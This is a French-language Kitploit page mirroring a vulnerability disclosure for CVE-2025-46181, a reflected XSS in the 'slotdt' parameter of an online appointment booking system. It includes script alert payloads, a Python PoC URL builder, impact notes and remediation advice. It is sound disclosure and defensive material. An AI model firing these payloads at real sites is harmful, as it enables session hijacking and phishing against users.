Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-46181-XSS — Divulgation de vulnérabilité XSS réfléchie avec script PoC et guide de remédiation pour un système de réservation de rendez-vous en ligne. Comprend l'analyse des paramètres vulnérables et l'évaluation de l'impact. | Kitploit
Outils/GitHubGitHub/shemkumar/cve-2025-46181-xss
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubshemkumar/cve-2025-46181-xss

CVE-2025-46181-XSS

Divulgation de vulnérabilité XSS réfléchie avec script PoC et guide de remédiation pour un système de réservation de rendez-vous en ligne. Comprend l'analyse des paramètres vulnérables et l'évaluation de l'impact.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 anPas encore vérifié

CVE-2025-46181 - XSS Réfléchi dans un Système de Réservation de Rendez-vous en Ligne

CVE-ID : CVE-2025-46181
Découvert par : Shemkumar P (shemkumar.github.io)
Type de vulnérabilité : Cross-Site Scripting Réfléchi (XSS)
Gravité : Moyenne
Statut : Divulgué, CVE attribué par MITRE


✨ Description

Une vulnérabilité de Cross-Site Scripting réfléchi (XSS) existe dans un système public de réservation de rendez-vous en ligne (v1.0), en particulier dans la page qui gère la confirmation de rendez-vous. Un paramètre GET ne parvient pas à assainir correctement les entrées, permettant l'injection de JavaScript et l'exécution de code dans le navigateur de la victime.


📍 Paramètre Vulnérable

root@kitploit:~
GET /confirmapp.php?slotdt=<payload>

Exemple de Charge Utile (Encodée) :

root@kitploit:~
<script>alert("XSS")</script>

💥 Preuve de Concept (PoC)

root@kitploit:~
<script>alert("You have been hijacked")</script>

🚫 Lien en direct expurgé pour des raisons éthiques. Cette vulnérabilité a été testée dans un environnement contrôlé.


⚙️ Script Python de Preuve de Concept

root@kitploit:~
import requests
from urllib.parse import quote

base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'

params = {
    'fullname': 'test',
    'mobile': '9999999999',
    'emailid': '[email protected]',
    'slotdt': payload,
    'slottime': '11:00:00',
    'doctorid': '2'
}

encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")

🛡️ Impact

  • Exécution arbitraire de JavaScript
  • Détournement de session potentiel
  • Redirection par clickjacking ou phishing
  • Attaques ciblées via des liens conçus

🧪 Correction

L'application devrait :

  • Échapper les entrées utilisateur avec htmlspecialchars() en PHP
  • Utiliser une Politique de Sécurité du Contenu (CSP)
  • Assainir les données utilisateur côté client et serveur

📜 Chronologie

  • Découvert : Mai 2025
  • CVE attribué par MITRE : Juin 2025
  • Publication publique : Juin 2025

🧑‍💻 Auteur

Shemkumar P
🕸️ shemkumar.github.io
🔐 Chercheur en cybersécurité | Passionné de CTF | Reporter de CVE


⚠️ Cette publication est uniquement destinée à un usage éducatif et défensif. Tester ou exploiter des vulnérabilités sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégal et contraire à l'éthique.

Télécharger l’outil